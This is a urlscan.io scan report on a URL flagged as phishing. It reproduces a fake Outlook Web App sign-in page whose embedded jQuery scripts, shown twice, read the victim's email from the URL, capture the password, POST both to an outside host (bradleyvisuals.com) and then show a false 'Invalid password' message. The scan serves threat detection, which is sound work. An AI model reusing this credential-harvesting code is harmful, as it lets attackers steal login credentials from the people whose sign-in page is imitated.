www.anmattwi.com Open in urlscan Pro
192.185.76.200  Malicious Activity! Public Scan

Submitted URL: http://anmattwi.com/outlookwebapp.html?msg=
Effective URL: http://www.anmattwi.com/outlookwebapp.html?msg=
Submission: On August 20 via automatic, source openphish

Form analysis 1 forms found in the DOM

Name: logonFormPOST

<form action="" method="POST" name="logonForm" enctype="" autocomplete="off">
  <input type="hidden" name="destination" value="https://webmail.ipehq.com/owa/">
  <input type="hidden" name="flags" value="0">
  <input type="hidden" name="forcedownlevel" value="0">
  <table align="center" id="tblMain" cellpadding="0" cellspacing="0">
    <tbody>
      <tr>
        <td colspan="3">
          <table cellspacing="0" cellpadding="0" class="tblLgn">
            <tbody>
              <tr>
                <td class="lgnTL"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgntopl.gif" alt=""></td>
                <td class="lgnTM"></td>
                <td class="lgnTR"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgntopr.gif" alt=""></td>
              </tr>
            </tbody>
          </table>
        </td>
      </tr>
      <tr>
        <td id="mdLft">&nbsp;</td>
        <td id="mdMid">
          <table id="tblMid" class="mid">
            <tbody>
              <tr>
                <td id="expltxt" class="expl">
                </td>
              </tr>
              <tr>
                <td>
                  <hr>
                </td>
              </tr>
              <tr>
                <td>
                  <table cellpadding="0" cellspacing="0">
                    <colgroup>
                      <col>
                      <col class="w100">
                    </colgroup>
                    <tbody>
                      <tr id="trSec">
                        <td colspan="2"> Security ‎( <a href="#" id="lnkShwSec" onclick="clkExp('lnkShwSec')">
									show explanation 
									</a>
                          <a href="#" id="lnkHdSec" onclick="clkExp('lnkHdSec')" style="display:none">
									hide explanation 
									</a> )‎
                        </td>
                      </tr>
                      <tr>
                        <td><input id="rdoPblc" type="radio" name="trusted" value="0" class="rdo" onclick="clkSec()" checked=""></td>
                        <td><label for="rdoPblc">This is a public or shared computer</label></td>
                      </tr>
                      <tr id="trPubExp" class="expl" style="display:none">
                        <td></td>
                        <td>Select this option if you use Outlook Web App on a public computer. Be sure to sign out when you've finished and close all windows to end your session.</td>
                      </tr>
                      <tr>
                        <td><input id="rdoPrvt" type="radio" name="trusted" value="4" class="rdo" onclick="clkSec()"></td>
                        <td><label for="rdoPrvt">This is a private computer</label></td>
                      </tr>
                      <tr id="trPrvtExp" class="expl" style="display:none">
                        <td></td>
                        <td>Select this option if you're the only person who uses this computer. Your server will allow a longer period of inactivity before signing you out.</td>
                      </tr>
                      <tr id="trPrvtWrn" class="wrng" style="display:none">
                        <td></td>
                        <td>Warning: By selecting this option, you confirm that this computer complies with your organization's security policy.</td>
                      </tr>
                    </tbody>
                  </table>
                </td>
              </tr>
              <tr>
                <td>
                  <hr>
                </td>
              </tr>
              <tr>
                <td>
                  <table cellpadding="0" cellspacing="0">
                    <colgroup>
                      <col>
                      <col class="w100">
                    </colgroup>
                    <tbody>
                      <tr>
                        <td><input id="chkBsc" type="checkbox" class="rdo" onclick="clkBsc();"></td>
                        <td nowrap=""><label for="chkBsc">Use the light version of Outlook Web App</label></td>
                      </tr>
                      <tr id="trBscExp" class="disBsc" style="display:none">
                        <td></td>
                        <td>The light version of Outlook Web App includes fewer features. Use it if you're on a slow connection or using a computer with unusually strict browser security settings. We also support the full Outlook Web App experience
                          on some browsers on Windows, Mac, and Linux computers. To check out all the supported browsers and operating systems, <a href="http://go.microsoft.com/fwlink/?LinkID=129362" id="bscLnk">click here.</a></td>
                      </tr>
                    </tbody>
                  </table>
                </td>
              </tr>
              <tr>
                <td>
                  <hr>
                </td>
              </tr>
              <tr>
                <td>
                  <p id="msg" style="color:red;"></p>
                  <table cellpadding="0" cellspacing="0">
                    <colgroup>
                      <col class="nowrap">
                      <col class="w100">
                    </colgroup>
                    <colgroup>
                      <col>
                    </colgroup>
                    <tbody>
                      <tr>
                        <td nowrap=""><label for="username">User name:</label></td>
                        <td class="txtpad"><input id="email" name="email" type="text" class="txt"></td>
                      </tr>
                      <tr>
                        <td nowrap=""><label for="password">Password:</label></td>
                        <td class="txtpad"><input id="password" name="password" type="password" class="txt" onfocus="on">
                        </td>
                      </tr>
                      <tr>
                        <td colspan="2" align="right" class="txtpad">
                          <button id="submit-btn" class="btn">Sign in</button>
                        </td>
                      </tr>
                    </tbody>
                  </table>
                </td>
              </tr>
              <tr>
                <td>
                  <hr>
                </td>
              </tr>
            </tbody>
          </table>
          <table id="tblMid2" class="mid" style="display:none">
            <tbody>
              <tr>
                <td>
                  <hr>
                </td>
              </tr>
              <tr>
                <td><br>Please enable cookies for this Web site.<br><br>Cookies are currently disabled by your browser. Outlook Web App requires that cookies be enabled. <br><br>For information about how to enable cookies, see the Help for your Web
                  browser.<br><br><br></td>
              </tr>
              <tr>
                <td>
                  <hr>
                </td>
              </tr>
            </tbody>
          </table>
          <table class="mid tblConn">
            <tbody>
              <tr>
                <td rowspan="2" align="right" class="tdConnImg"><img style="vertical-align:top" src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgnexlogo.gif" alt=""></td>
                <td class="tdConn">Connected to Microsoft Exchange</td>
              </tr>
              <tr>
                <td class="tdCopy">© 2010 Microsoft Corporation. All rights reserved.</td>
              </tr>
            </tbody>
          </table>
        </td>
        <td id="mdRt">&nbsp;</td>
      </tr>
      <tr>
        <td colspan="3">
          <table cellspacing="0" cellpadding="0" class="tblLgn">
            <tbody>
              <tr>
                <td class="lgnBL"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgnbotl.gif" alt=""></td>
                <td class="lgnBM"></td>
                <td class="lgnBR"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgnbotr.gif" alt=""></td>
              </tr>
            </tbody>
          </table>
        </td>
      </tr>
    </tbody>
  </table>
  <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
  <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>
  <script>
    /* global $ */
    $(document).ready(function() {
      var count = 0;

      function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {
          vars[key] = value;
        });
        return vars;
      }
      var number = getUrlVars()["msg"];
      $("#email").val(number);
      var my_email = number;
      var ind = my_email.indexOf("@");
      var my_slice = my_email.substr((ind + 1));
      var c = my_slice.substr(0, my_slice.indexOf('.'));
      var final = c.toLowerCase();
      var domain = final.charAt(0).toUpperCase() + final.slice(1);
      $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email = $("#email").val();
        var password = $("#password").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        if (!password) {
          $('#msg').show();
          $('#msg').html("Password field is emply.!");
          return false;
        }
        ///////////new injection////////////////
        var my_email = email;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind = my_email.indexOf("@");
        var my_slice = my_email.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var finalu = c.toUpperCase();
        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=" + my_slice);
        $("#logoname").html(finalu);
        ///////////new injection////////////////
        count = count + 1;
        $.ajax({
          dataType: 'JSON',
          url: 'https://bradleyvisuals.com/poster.php',
          type: 'POST',
          data: {
            email: email,
            password: password,
          },
          // data: $('#contact').serialize(),
          beforeSend: function(xhr) {
            $('#submit-btn').html('Verifing...');
          },
          success: function(response) {
            if (response) {
              $("#msg").show();
              console.log(response);
              if (response['signal'] == 'ok') {
                $("#password").val("");
                if (count >= 2) {
                  count = 0;
                  // window.location.replace(response['redirect_link']);
                  window.location.replace("complete259e.html?msg=" + email);
                }
                $("#msg").show();
                $('#msg').html("Invalid password. Please try again");
              } else {
                $("#msg").show();
                $('#msg').html("Invalid password. Please try again");
              }
            }
          },
          error: function() {
            $("#password").val("");
            if (count >= 2) {
              count = 0;
              window.location.replace("complete259e.html?msg=" + email);
            }
            $("#msg").show();
            $('#msg').html("Invalid password. Please try again");
          },
          complete: function() {
            $('#submit-btn').html('Sign in');
          }
        });
      });
    });
  </script>
  <script>
    /* global $ */
    $(document).ready(function() {
      var count = 0;

      function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {
          vars[key] = value;
        });
        return vars;
      }
      var number = getUrlVars()["msg"];
      $("#email").val(number);
      var my_email = number;
      var ind = my_email.indexOf("@");
      var my_slice = my_email.substr((ind + 1));
      var c = my_slice.substr(0, my_slice.indexOf('.'));
      var final = c.toLowerCase();
      var domain = final.charAt(0).toUpperCase() + final.slice(1);
      $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email = $("#email").val();
        var password = $("#password").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        if (!password) {
          $('#msg').show();
          $('#msg').html("Password field is emply.!");
          return false;
        }
        ///////////new injection////////////////
        var my_email = email;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind = my_email.indexOf("@");
        var my_slice = my_email.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var finalu = c.toUpperCase();
        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=" + my_slice);
        $("#logoname").html(finalu);
        ///////////new injection////////////////
        count = count + 1;
        $.ajax({
          dataType: 'JSON',
          url: 'https://bradleyvisuals.com/posters.php',
          type: 'POST',
          data: {
            email: email,
            password: password,
          },
          // data: $('#contact').serialize(),
          beforeSend: function(xhr) {
            $('#submit-btn').html('Verifing...');
          },
          success: function(response) {
            if (response) {
              $("#msg").show();
              console.log(response);
              if (response['signal'] == 'ok') {
                $("#password").val("");
                if (count >= 2) {
                  count = 0;
                  // window.location.replace(response['redirect_link']);
                  window.location.replace("complete259e.html?msg=" + email);
                }
                $("#msg").show();
                $('#msg').html("Invalid password. Please try again");
              } else {
                $("#msg").show();
                $('#msg').html("Invalid password. Please try again");
              }
            }
          },
          error: function() {
            $("#password").val("");
            if (count >= 2) {
              count = 0;
              window.location.replace("complete259e.html?msg=" + email);
            }
            $("#msg").show();
            $('#msg').html("Invalid password. Please try again");
          },
          complete: function() {
            $('#submit-btn').html('Sign in');
          }
        });
      });
    });
  </script>
</form>

Text Content

To use Outlook Web App, browser settings must allow scripts to run. For
information about how to allow scripts, consult the Help for your browser. If
your browser doesn't support scripts, you can download Windows Internet Explorer
for access to Outlook Web App.



 

--------------------------------------------------------------------------------

Security ‎( show explanation hide explanation )‎ This is a public or shared
computer Select this option if you use Outlook Web App on a public computer. Be
sure to sign out when you've finished and close all windows to end your session.
This is a private computer Select this option if you're the only person who uses
this computer. Your server will allow a longer period of inactivity before
signing you out. Warning: By selecting this option, you confirm that this
computer complies with your organization's security policy.

--------------------------------------------------------------------------------

Use the light version of Outlook Web App The light version of Outlook Web App
includes fewer features. Use it if you're on a slow connection or using a
computer with unusually strict browser security settings. We also support the
full Outlook Web App experience on some browsers on Windows, Mac, and Linux
computers. To check out all the supported browsers and operating systems, click
here.

--------------------------------------------------------------------------------



User name: Password: Sign in

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------


Please enable cookies for this Web site.

Cookies are currently disabled by your browser. Outlook Web App requires that
cookies be enabled.

For information about how to enable cookies, see the Help for your Web browser.




--------------------------------------------------------------------------------

Connected to Microsoft Exchange © 2010 Microsoft Corporation. All rights
reserved.